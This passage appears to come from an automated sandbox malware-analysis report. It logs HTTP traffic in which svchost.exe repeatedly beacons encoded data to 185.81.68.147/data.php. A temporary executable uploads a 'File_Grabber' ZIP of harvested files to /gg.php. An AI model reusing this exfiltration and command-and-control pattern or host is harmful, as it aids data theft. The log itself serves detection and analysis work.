                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:43.115217924 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:42 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      38192.168.2.549797185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:41.641930103 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:43.326915979 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:42 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      39192.168.2.549803185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:43.457068920 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:45.007209063 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:44 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      40192.168.2.549804185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:43.577195883 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:45.263191938 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:44 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      41192.168.2.549808185.81.68.147802300C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:44.975020885 CET12360OUTPOST /gg.php HTTP/1.1
                                                                                      Host: 185.81.68.147
                                                                                      Accept: */*
                                                                                      Content-Length: 89184
                                                                                      Content-Type: multipart/form-data; boundary=------------------------KP8UOnaSGiZUFlAIy5XNqt
                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4b 50 38 55 4f 6e 61 53 47 69 5a 55 46 6c 41 49 79 35 58 4e 71 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 6f 67 46 69 6c 65 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 e5 18 d9 6a 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 31 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e4 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 bc a6 9f 68 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 32 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e2 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 3e 4d bf df 07 01 00 00 fc [TRUNCATED]
                                                                                      Data Ascii: --------------------------KP8UOnaSGiZUFlAIy5XNqtContent-Disposition: form-data; name="log"; filename="LogFile.zip"Content-Type: application/zipPK j-\File_Grabber\0.1.filtertrie.intermediate.txt34PK h-\File_Grabber\0.2.filtertrie.intermediate.txt34PK >M!\File_Grabber\1-7FeatureCache.txt]R[!@"$mGBj[m6o_oWqN6;<V+H3=lU#v/iY<=2BM;t",2Q[iLmFKK%w WaR!fbp}rtV6NisV;':Y3gusJ"G!:g][:{CjA>7{yiU85QZetn0}7h|PK sh#\File_Grabber\AlternateServices.txt0=zlh~LO}!MMiR[-BA+<-2McBNNF!O@<S?<|WT@Ma|.h>pkf6RZY/PNEw)CL9DU$-upa30#bg-%qyUX`<tPK F8a\File_Grabber\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_8[ [TRUNCATED]
                                                                                      Dec 26, 2024 12:05:45.094813108 CET2472OUTData Raw: 71 37 65 ea 5c a2 49 4d 4a f7 f4 a9 bb f5 66 76 4f 08 29 ae 18 9e 8c 7f be dc 2f 56 45 45 de 02 4a 1d 8c ae be 67 31 f2 75 be 12 36 6a be a0 97 7b 88 01 95 0d b6 24 1d f9 51 c3 f3 11 e9 5b 81 94 dd 13 db 70 3a db db 5f 3c a5 2b 1c 73 8e 7a d9 25
                                                                                      Data Ascii: q7e\IMJfvO)/VEEJg1u6j{$Q[p:_<+sz%,B<*N~[*>WLWW4is W$;a]F3?aK>Eyy%Zl1%1P$DSC?g[_i?eyC*/m
                                                                                      Dec 26, 2024 12:05:45.094835997 CET2472OUTData Raw: 84 26 eb cd 43 8b 40 e6 de b3 4d a0 0d 35 9f 88 77 8d 3c 4d d2 b4 51 21 52 1e 19 ed b1 84 98 43 e2 92 78 42 2d 90 17 e6 be a1 67 23 9f 03 a8 0c 0f 0d 8f a5 ee e0 e8 8e db 98 55 86 ee 89 a4 1e e7 d0 07 81 0a a7 58 f5 a5 fb 40 0f 73 d1 85 d1 7a 97
                                                                                      Data Ascii: &C@M5w<MQ!RCxB-g#UX@szMRJ4tj9_h:<$=:>v4"kPIVrDxhnod`p6cAqpiAi?}w8c*3:6+n/0L6
                                                                                      Dec 26, 2024 12:05:45.094897985 CET2472OUTData Raw: 73 b3 4d 4e af c5 a1 de 9f dd 4c e2 eb 4d d3 3b 41 0e 51 c4 7b b3 0e 6c 83 b3 67 64 62 b5 ce 4a 73 66 9e e2 13 39 cc 56 9e e0 4b 82 27 8e 25 b2 46 94 3e 3b 01 09 89 57 93 29 2b fb a4 21 69 ff c0 ba 22 49 e3 4e 48 b8 d1 e1 ba 7c 74 49 4a 83 fd 9e
                                                                                      Data Ascii: sMNLM;AQ{lgdbJsf9VK'%F>;W)+!i"INH|tIJ_ Fj#bL\#o#<;o$Q8hMhMeo0c9~scgiAk2A#]?H$~H+A~s$oJv i;9 cE8'8YDe(?;nykG
                                                                                      Dec 26, 2024 12:05:45.094918013 CET2472OUTData Raw: 16 e2 a1 d9 7e d7 59 81 0f 2f 4a 59 f4 ea 11 1d 8c 2b ac 74 37 58 0b b1 30 80 22 17 28 fe 05 8a 1e c2 0b 2d 06 43 4c 61 12 c8 f6 61 d0 bf 1b 5d 9c cc ff dd d3 92 34 44 65 60 88 94 e5 a4 b8 b4 43 69 bc d0 ae bf b9 d7 94 2c 41 58 3c 0a d4 11 ff 16
                                                                                      Data Ascii: ~Y/JY+t7X0"(-CLaa]4De`Ci,AX< -V9BVReIKz){_O'7&tXw4">V?$XTd5MffH2Jx?*6<-iT%B!:FDR
                                                                                      Dec 26, 2024 12:05:45.094939947 CET2472OUTData Raw: e0 70 c6 eb 84 09 24 cb c0 1e 6d ad ce 65 03 90 90 39 47 d8 38 2c 68 43 2c a8 54 4e 60 aa c4 6d 24 48 3d 12 30 f0 55 c3 03 74 e0 86 16 15 7e 6d 8d c2 d7 10 4e f1 e1 90 5a 16 9d 8f 45 b8 d9 f8 10 f0 7a b3 0c 17 98 0e 24 9a b8 ab 39 d7 d1 70 c6 bb
                                                                                      Data Ascii: p$me9G8,hC,TN`m$H=0Ut~mNZEz$9pao0EcCZ'xX\)GS'C89FNO Vt>{93-1@{cSz(13>/c5FFm_N~]0(o?;i`2\%
                                                                                      Dec 26, 2024 12:05:45.094968081 CET4944OUTData Raw: 63 7d 92 c9 75 be c8 2b c5 1d e3 ad c6 30 e7 7b 4c b9 79 01 98 8c ba 00 48 90 2d bf 84 17 52 c9 95 7e ec 31 c5 10 cd 5b 29 46 bc e6 2a 37 cc 75 38 22 14 95 01 ea f6 a7 33 e2 8c b5 04 b9 c1 8d f3 af 06 7d d7 66 7c 53 bd 64 de 56 e2 44 fd 4b dc 43
                                                                                      Data Ascii: c}u+0{LyH-R~1[)F*7u8"3}f|SdVDKCTO/y9IpUy?=r/w~ s}Zrgr8~{YA)P~4:3e%?q3@h94VXkM8c4a
                                                                                      Dec 26, 2024 12:05:45.094980001 CET2472OUTData Raw: d4 24 0d bc d5 c8 bc 0a b9 7c 07 cf 1a f6 c4 37 88 ef c4 78 22 ad 4a ec 1f 87 26 dd fc 99 c0 a3 65 b5 48 93 20 f0 24 1c 9e a3 5a 35 ca 21 38 14 5d aa c2 d8 7a cc d6 2d 5f 4b b5 bf 59 e7 cb 5a 7a 8b 7c 46 8b 59 58 96 d7 a4 0d a4 e5 a9 ca 27 e6 53
                                                                                      Data Ascii: $|7x"J&eH $Z5!8]z-_KYZz|FYX'Saa;U/Himv2fTT+]1hveQ4lvc^vfP&O\'-<[]RV0o,|3ey4Xwo*y,_OX|K,
                                                                                      Dec 26, 2024 12:05:45.095001936 CET2472OUTData Raw: 76 06 67 9b 49 a5 42 97 5e 00 3a 8b 31 cf 9a 6d ee 31 52 26 0c 81 c3 e5 a8 7a 0b 78 53 00 f2 64 2b cb b6 bf d0 a6 c7 c4 ff 65 20 20 67 5e 1b 7b a2 6d 58 4b 9d be 1b 56 9c 1c a7 f3 b6 1e 19 00 61 9a 2e 19 d9 6e 07 0a 2e bb a0 01 38 4b 71 99 18 37
                                                                                      Data Ascii: vgIB^:1m1R&zxSd+e g^{mXKVa.n.8Kq7_RQqW9RCIz3/]=h[;5@#C||8E7UjQow{Ww(Rj/J-g:1`?(N{Wkyg51A
                                                                                      Dec 26, 2024 12:05:45.095015049 CET2472OUTData Raw: 24 20 96 dd 3f c2 ee 83 bf fd 0b fa e1 91 92 54 d3 12 09 db b7 b3 30 f3 ba d3 53 2f 5d 2c ce 20 97 ce 2f 00 0e 3b d9 a7 ee 97 8f b6 2e 1f 15 73 52 bc e2 b9 35 90 a4 34 8c 0b 8f ea 13 69 ea 99 d2 1a f7 09 3b eb 33 83 b3 cc 7c 30 87 3f 8b 84 90 6b
                                                                                      Data Ascii: $ ?T0S/], /;.sR54i;3|0?kIf-bRt\X^"27o=X}X'H+'2F:rpb&M}_.a}5z`\9)_M3.WW)&EQk
                                                                                      Dec 26, 2024 12:05:45.214875937 CET4944OUTData Raw: 80 1c 65 59 aa 70 13 d8 61 7e b8 8d 2e 40 f6 65 8e 37 96 c7 dc f8 bf 83 e4 02 65 40 b8 11 d4 0c 75 ee 7f d6 5d aa c1 cb 4d 2e d5 21 28 ee 10 9d 24 96 0c f3 25 08 96 07 dd e0 60 e2 e0 c6 8a bd cb 2e 51 3b 05 12 91 e5 7f 5b 86 22 cb ef 4e bc 86 2c
                                                                                      Data Ascii: eYpa~.@e7e@u]M.!($%`.Q;["N,,`+*y%nfECbEGph@HD9HyZ'_wMh/nY4Qt6nqq~Y2D\,wBEqh*t-/X/*wP4n
                                                                                      Dec 26, 2024 12:05:46.995048046 CET147INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:46 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      42192.168.2.549809185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:45.230406046 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:46.794706106 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:46 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      43192.168.2.549811185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:45.511857986 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      44192.168.2.549816185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:47.027240038 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      45192.168.2.549817185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:47.683759928 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      46192.168.2.549818185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:47.695264101 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      47192.168.2.549829185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:51.809298038 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      48192.168.2.549830185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:51.820303917 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      49192.168.2.549841185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:55.941612005 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      50192.168.2.549842185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:55.953883886 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      51192.168.2.549850185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:00.064533949 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:02.937045097 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:01 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      52192.168.2.549851185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:00.109869957 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:03.045646906 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:01 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      53192.168.2.549860185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:03.168540955 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
